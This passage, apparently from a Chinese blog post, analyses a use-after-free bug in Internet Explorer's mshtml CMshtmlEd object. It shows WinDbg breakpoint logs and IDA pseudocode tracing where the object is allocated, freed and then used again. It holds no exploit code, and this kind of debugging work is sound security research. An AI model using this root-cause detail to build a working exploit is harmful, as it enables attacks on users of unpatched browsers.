此时edi+8所指向对象无效,已经被释放,由于这是一个UAF漏洞,我们需要了解一下它的运行过程
-
何时初始化
-
何时释放
-
何时调用-调用就发生在崩溃处
我们查看一个这个对象的相关函数
0:005> x mshtml!CMshtmlEd::*6899352b mshtml!CMshtmlEd::Release=<no type information>689938cd mshtml!CMshtmlEd::QueryInterface=<no type information>688ba635 mshtml!CMshtmlEd::Initialize=<no type information>6890a5d9 mshtml!CMshtmlEd::AddRef=<no type information>6890a4c8 mshtml!CMshtmlEd::`vftable' =<no type information>68994ee2 mshtml!CMshtmlEd::IsDialogCommand=<no type information>688fe118 mshtml!CMshtmlEd::QueryStatus=<no type information>687716e3 mshtml!CMshtmlEd::GetSegmentList=<no type information>68994faf mshtml!CMshtmlEd::Exec=<no type information>688ba98d mshtml!CMshtmlEd::CMshtmlEd=<no type information>689acd5b mshtml!CMshtmlEd::~CMshtmlEd=<no type information>
由名字可推测Initialize、Release、CMshtmlEd 、~CMshtmlEd 与对象创建释放有关
我们首先在Initialize和Release处分别下一个断点,然后调试看看
0:000> bp mshtml!CMshtmlEd::Release0:000> bp mshtml!CMshtmlEd::Initialize0:013> gBreakpoint 0 hiteax=07a5af78 ebx=00000000 ecx=6890a4c8 edx=00051078 esi=057f8f8c edi=07a5eff0eip=6899352b esp=0474d418 ebp=0474d440 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release:6899352b 8bff mov edi,edi
一开始便进入Release函数中,这一次应该是EXP代码中一开始的页面重绘,直接按g运行
0:005> gBreakpoint 1 hiteax=071bafd8 ebx=04998f20 ecx=00000000 edx=07a66f78 esi=07a66f78 edi=04998faceip=688ba635 esp=0474967c ebp=0474968c iopl=0nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Initialize:688ba635 f6868400000002 test byte ptr [esi+84h],2 ds:0023:07a66ffc=000:005> g 0x`688ba65beax=00000000 ebx=04998f20 ecx=03a29f30 edx=00000000 esi=07a66f78 edi=07a66f88eip=688ba65b esp=0474966c ebp=0474968c iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x26:688ba65b ff1500137568 call dword ptr [mshtml!_imp__HeapAlloc (68751300)] ds:0023:68751300={ntdll!RtlAllocateHeap (76e72dd6)}0:005> peax=07a68fc0 ebx=04998f20 ecx=76e75dd3 edx=00000000 esi=07a66f78 edi=07a66f88eip=688ba661 esp=04749678ebp=0474968c iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:688ba661 85c0 test eax,eax
接着便进入了Initialize函数中,我们直接运行到HeapAlloc函数之后,eax=07a68fc0 ,这就是HeapAlloc函数申请的空间地址,接着按g,看后面哪里会释放这个地址空间
0:005> gBreakpoint 1 hiteax=071bafd8 ebx=04998f20 ecx=00000000 edx=080a4f78 esi=080a4f78 edi=047496c0eip=688ba635 esp=04749694ebp=047496a4 iopl=0nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Initialize:688ba635 f6868400000002 test byte ptr [esi+84h],2 ds:0023:080a4ffc=000:005> g 0x`688ba661eax=08428fc0 ebx=04998f20 ecx=76e75dd3 edx=00000000 esi=080a4f78 edi=080a4f88eip=688ba661 esp=04749690ebp=047496a4 iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:688ba661 85c0 test eax,eax
这一次还是进入了Initialize函数,申请了eax=08428fc0,接着按g,进入到Release函数,一直按p到HeapFree函数
0:005>eax=00000000 ebx=04998f8c ecx=00000000 edx=04998f8c esi=080a4f78 edi=00000001eip=689acd49 esp=04745aec ebp=04745afc iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x1f:689acd49 ff15fc127568 call dword ptr [mshtml!_imp__HeapFree (687512fc)] ds:0023:687512fc={kernel32!HeapFree (7555bbd0)}0:005> dd esp04745aec 0005000000000000080a4f78 080a4f7804745afc 04745b14 68bb0391 080a4f78 04998f2004745b0c 0000000004998fac 04745b40 68babd3a04745b1c 080a4f78 085b2fd8 000000000000000f04745b2c 04998f20 080a4f78 085b2fd8 08530fd804745b3c 078c6fd8 04745b48 68a2c0e7 04745b6404745b4c 689945c6 04998f20 0000000f 0808ef3004745b5c 0000000005cd8680 04745b80 6894344e
释放的是080a4f78,我们直接在这个HeapFree这里下一个断点,方便调试,接着按g
直接就到了崩溃处
0:005> g(d94.b64): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=04998f30 edx=0000000d esi=00000000 edi=080a4f78eip=6899503e esp=047496f4 ebp=04749700 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206mshtml!CMshtmlEd::Exec+0x131:6899503e 8b7f08 mov edi,dword ptr [edi+8] ds:0023:080a4f80=????????
释放的地址与前面申请的地址不符就直接到了崩溃处,说明我们的断点下错了,这时重新看一下CMshtmlEd函数
int __fastcall CMshtmlEd::CMshtmlEd(int a1, int a2, int a3, int a4){int v4; // edx@1*(_DWORD *)a2 = &CMshtmlEd::`vftable';CSpringLoader::CSpringLoader((CSpringLoader *)(a2 + 24), (struct CMshtmlEd *)a2);*(_DWORD *)(v4 + 8) = a3;*(_DWORD *)(v4 + 4) = 1;*(_DWORD *)(v4 + 132) ^= (*(_DWORD *)(v4 + 132) ^ 2 * (a4 != 0)) & 2;return v4;}
可见函数将CMshtmlEd把虚表给了a2指向的地址,所以a2是CMshtmlEd的对象指针
在IDA中按一个X,查看哪些函数引用了这个函数
CHTMLEditor::AddCommandTarget
__int32 __userpurge CHTMLEditor::AddCommandTarget@<eax>(CHTMLEditor *this@<ecx>, int *a2@<eax>, struct IMarkupContainer *a3, struct CMshtmlEd **a4){int *v4; // edi@1LPVOID v5; // eax@1CMshtmlEd *v6; // ecx@1int v7; // esi@1__int32 result; // eax@4CImplPtrAry *v9; // ecx@4int v10; // edi@5v4 = a2;v5 = HeapAlloc(g_hProcessHeap, 8u, 0x88u);v7 = 0;if ( v5 )v7 = CMshtmlEd::CMshtmlEd(v6, (int)v5, (struct CHTMLEditor *)a3, 0);*v4 = v7;if ( v7 ){result = CMshtmlEd::Initialize(v6);if ( result >= 0 ){v10 = *v4;result = CImplPtrAry::Append(v9);}}else{result = -2147024882;}return result;}
CHTMLEditor::GetCommandTarget
__int32 __stdcall CHTMLEditor::GetCommandTarget(CHTMLEditor *this, struct IUnknown *a2, struct IUnknown **a3){IUnknownVtbl *v3; // eax@3CHTMLEditor *v4; // ecx@3CHTMLEditor *v5; // ecx@6__int32 v6; // edi@6__int32 v7; // eax@7CHTMLEditor *v8; // ecx@7__int32 v10; // eax@18LPVOID v11; // eax@19CMshtmlEd *v12; // ecx@19int v13; // esi@20int (__stdcall ***v14)(_DWORD, _DWORD, _DWORD); // [sp+Ch] [bp-Ch]@1struct IMarkupContainer **v15; // [sp+10h] [bp-8h]@1struct IMarkupContainer *v16; // [sp+14h] [bp-4h]@1v15 = 0;v14 = 0;v16 = 0;if ( a2 && a3 ){v3 = a2->lpVtbl;v15 = 0;if ( v3->QueryInterface(a2, &IID_IMarkupContainer, &v15) ){v11 = HeapAlloc(g_hProcessHeap, 8u, 0x88u);if ( v11 )v13 = CMshtmlEd::CMshtmlEd(v12, (int)v11, this, 1);elsev13 = 0;if ( v13 ){v6 = CMshtmlEd::Initialize(v12);if ( v6 >= 0 ){v6 = (**(int (__stdcall ***)(int, GUID *, struct IUnknown **))v13)(v13, &IID_IUnknown, a3);if ( v6 >= 0 )(*(void (__stdcall **)(int))(*(_DWORD *)v13 + 8))(v13);}}else{v6 = -2147024882;}}else{if ( v16 )v16->lpVtbl->Release(v16);v16 = 0;v6 = CHTMLEditor::AdjustContainerCommandTarget(v4, (struct IMarkupContainer *)this, v15);if ( v6 >= 0 ){v7 = CHTMLEditor::FindCommandTarget(v5, v16, (struct CMshtmlEd **)&v14);v6 = v7;if ( v7 >= 0 ){if ( v7 != 1|| (v10 = CHTMLEditor::AddCommandTarget(v8,(int *)&v14,(struct IMarkupContainer *)this,(struct CMshtmlEd **)v16),v6 = v10,v10 >= 0) ){v6 = (**v14)(v14, &IID_IUnknown, a3);}}}}}else{v6 = -2147024809;}if ( v16 )v16->lpVtbl->Release(v16);if ( v15 )((void (__stdcall *)(struct IMarkupContainer **))(*v15)[2].lpVtbl)(v15);return v6;}
两个函数都是先HeapAlloc申请空间然后传入CMShtml构造函数,我们在这两个函数和上面两个函数处下断点,然后运行
0:000> bl0 e 67a4394f 0001 (0001) 0:**** mshtml!CHTMLEditor::GetCommandTarget1 e 6796a5d8 0001 (0001) 0:**** mshtml!CHTMLEditor::AddCommandTarget2 e 6796a635 0001 (0001) 0:**** mshtml!CMshtmlEd::Initialize3 e 67a4352b 0001 (0001) 0:**** mshtml!CMshtmlEd::Release0:000> g(56c.27c): Break instruction exception - code 80000003 (first chance)eax=7ff9e000 ebx=00000000 ecx=00000000 edx=772af125 esi=00000000 edi=00000000eip=772440f0 esp=088bf840 ebp=088bf86c iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246ntdll!DbgBreakPoint:772440f0 cc int 30:013> gBreakpoint3 hiteax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352b esp=043cd748 ebp=043cd770 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release:67a4352b 8bff mov edi,edi0:005> peax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352d esp=043cd748 ebp=043cd770 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x2:67a4352d 55 push ebp0:005>eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a4352e esp=043cd744 ebp=043cd770 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x3:67a4352e 8bec mov ebp,esp0:005>eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a43530 esp=043cd744 ebp=043cd744 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x5:67a43530 56 push esi0:005>eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=07c64f8c edi=08128ff0eip=67a43531 esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x6:67a43531 8b7508 mov esi,dword ptr [ebp+8] ss:0023:043cd74c=08124f780:005>eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a43534 esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Release+0x9:67a43534 ff4e04 dec dword ptr [esi+4] ds:0023:08124f7c=000000010:005>eax=08124f78 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a43537 esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0xc:67a43537 8b4604 mov eax,dword ptr [esi+4] ds:0023:08124f7c=000000000:005>eax=00000000 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a4353a esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0xf:67a4353a 0f84fb970100 je mshtml!CMshtmlEd::Release+0x11 (67a5cd3b) [br=1]0:005>eax=00000000 ebx=00000000 ecx=679ba4c8 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd3b esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x11:67a5cd3b e81b000000 call mshtml!CMshtmlEd::~CMshtmlEd (67a5cd5b)0:005>eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd40 esp=043cd740 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x16:67a5cd40 56 push esi0:005>eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd41 esp=043cd73c ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x17:67a5cd41 6a00 push 00:005>eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd43 esp=043cd738 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x19:67a5cd43 ff351884d367 push dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005>eax=00000000 ebx=00000000 ecx=00000000 edx=00211078 esi=08124f78 edi=08128ff0eip=67a5cd49 esp=043cd734 ebp=043cd744 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x1f:67a5cd49 ff15fc128067 call dword ptr [mshtml!_imp__HeapFree (678012fc)] ds:0023:678012fc={kernel32!HeapFree (763bbbd0)}0:005> dd esp043cd734 0021000000000000 08124f78 07c64f8c043cd744 043cd770 679dcfab 08124f78 07c64f20043cd754 00000000 67d3afd8 67a5ca26 67a5c9c3043cd764 0604b680 07c64f20 07c64f78 043cd78c043cd774 67a5c85c 00000000 67a5c83b 67a5c7f3043cd784 00000001 0604b680 043cd800 679bf212043cd794 07c64f20 67a22bab 00000001 0604b680043cd7a4 678e49c6 057d2fc8 00000000 0604b680
释放地址08124f78,在这个函数处下一个断点,方便调试,然后按g
0:005> gBreakpoint1 hiteax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5d8 esp=043c99c0 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget:6796a5d8 8bff mov edi,edi0:005> peax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5da esp=043c99c0 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x2:6796a5da 55 push ebp0:005>eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5db esp=043c99bc ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x3:6796a5db 8bec mov ebp,esp0:005>eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5dd esp=043c99bc ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x5:6796a5dd 53 push ebx0:005>eax=0834efac ebx=00000001 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5de esp=043c99b8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x6:6796a5de 8b5d08 mov ebx,dword ptr [ebp+8] ss:0023:043c99c4=0834ef200:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e1 esp=043c99b8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x9:6796a5e1 56 push esi0:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e2 esp=043c99b4 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0xa:6796a5e2 57 push edi0:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e3 esp=043c99b0 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0xb:6796a5e3 6888000000 push 88h0:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5e8 esp=043c99ac ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x10:6796a5e8 6a08 push 80:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5ea esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x12:6796a5ea ff351884d367 push dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5f0 esp=043c99a4 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x18:6796a5f0 8bf8 mov edi,eax0:005>eax=0834efac ebx=0834ef20 ecx=00000000 edx=0000096a esi=0834ef20 edi=0834efaceip=6796a5f2 esp=043c99a4 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x1a:6796a5f2 ff1500138067 call dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005>eax=08051f78 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0834ef20 edi=0834efaceip=6796a5f8 esp=043c99b0 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x20:
AddCommandTarget中申请的地址08051f78,按g
0:005> gBreakpoint2 hiteax=07116fd8 ebx=0834ef20 ecx=00000000 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a635 esp=043c99ac ebp=043c99bc iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206mshtml!CMshtmlEd::Initialize:6796a635 f6868400000002 test byte ptr [esi+84h],2ds:0023:08051ffc=000:005> peax=07116fd8 ebx=0834ef20 ecx=00000000 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63c esp=043c99ac ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x7:6796a63c 8b08 mov ecx,dword ptr [eax] ds:0023:07116fd8=67d3caf00:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63e esp=043c99ac ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x9:6796a63e 57 push edi0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a63f esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0xa:6796a63f 7551 jne mshtml!CMshtmlEd::Initialize+0x64 (6796a692) [br=0]0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=0834efaceip=6796a641 esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0xc:6796a641 8d7e10 lea edi,[esi+10h]0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a644 esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0xf:6796a644 57 push edi0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a645 esp=043c99a4 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x10:6796a645 6860519c67 push offset mshtml!IID_IMarkupContainer (679c5160)0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a64a esp=043c99a0 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x15:6796a64a 50 push eax0:005>eax=07116fd8 ebx=0834ef20 ecx=67d3caf0 edx=08051f78 esi=08051f78 edi=08051f88eip=6796a64b esp=043c999c ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x16:6796a64b ff11 call dword ptr [ecx] ds:0023:67d3caf0={mshtml!PlainQueryInterface (679cfbfd)}0:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a64d esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x18:6796a64d 85c0 test eax,eax0:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a64f esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x1a:6796a64f 7c58 jl mshtml!CMshtmlEd::Initialize+0x7b (6796a6a9) [br=0]0:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a651 esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x1c:6796a651 6a40 push 40h0:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a653 esp=043c99a4 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x1e:6796a653 6a08 push 80:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a655 esp=043c99a0 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x20:6796a655 ff351884d367 push dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005>eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a65b esp=043c999c ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x26:6796a65b ff1500138067 call dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005>eax=08055fc0 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=08051f78 edi=08051f88eip=6796a661 esp=043c99a8 ebp=043c99bc iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:6796a661 85c0 test eax,eax
Initialize中申请的地址08055fc0,按g
0:005>eax=043c99f0 ebx=0834ef20 ecx=07cfcf30 edx=00000004 esi=0834ef20 edi=00000001eip=6796a5f0 esp=043c99bc ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x18:6796a5f0 8bf8 mov edi,eax0:005>eax=043c99f0 ebx=0834ef20 ecx=07cfcf30 edx=00000004 esi=0834ef20 edi=043c99f0eip=6796a5f2 esp=043c99bc ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x1a:6796a5f2 ff1500138067 call dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005>eax=0601df78 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0834ef20 edi=043c99f0eip=6796a5f8 esp=043c99c8 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x20:6796a5f8 33f6 xor esi,esi
申请的地址0601df78,按g
0:005>eax=00000000 ebx=0834ef20 ecx=0710ef30 edx=00000000 esi=0601df78 edi=0601df88eip=6796a655 esp=043c99b8 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x20:6796a655 ff351884d367 push dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005>eax=00000000 ebx=0834ef20 ecx=0710ef30 edx=00000000 esi=0601df78 edi=0601df88eip=6796a65b esp=043c99b4 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x26:6796a65b ff1500138067 call dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005>eax=05afafc0 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0601df78 edi=0601df88eip=6796a661 esp=043c99c0 ebp=043c99d4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:6796a661 85c0 test eax,eax
申请的地址05afafc0
0:005>eax=00000000 ebx=0834ef8c ecx=00000000 edx=0834ef8c esi=0601df78 edi=00000001eip=67a5cd43 esp=043c5e20 ebp=043c5e2c iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x19:67a5cd43 ff351884d367 push dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005>Breakpoint 4 hiteax=00000000 ebx=0834ef8c ecx=00000000 edx=0834ef8c esi=0601df78 edi=00000001eip=67a5cd49 esp=043c5e1c ebp=043c5e2c iopl=0nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246mshtml!CMshtmlEd::Release+0x1f:67a5cd49 ff15fc128067 call dword ptr [mshtml!_imp__HeapFree (678012fc)] ds:0023:678012fc={kernel32!HeapFree (763bbbd0)}0:005> dd esp043c5e1c 00210000000000000601df78 0601df78043c5e2c 043c5e44 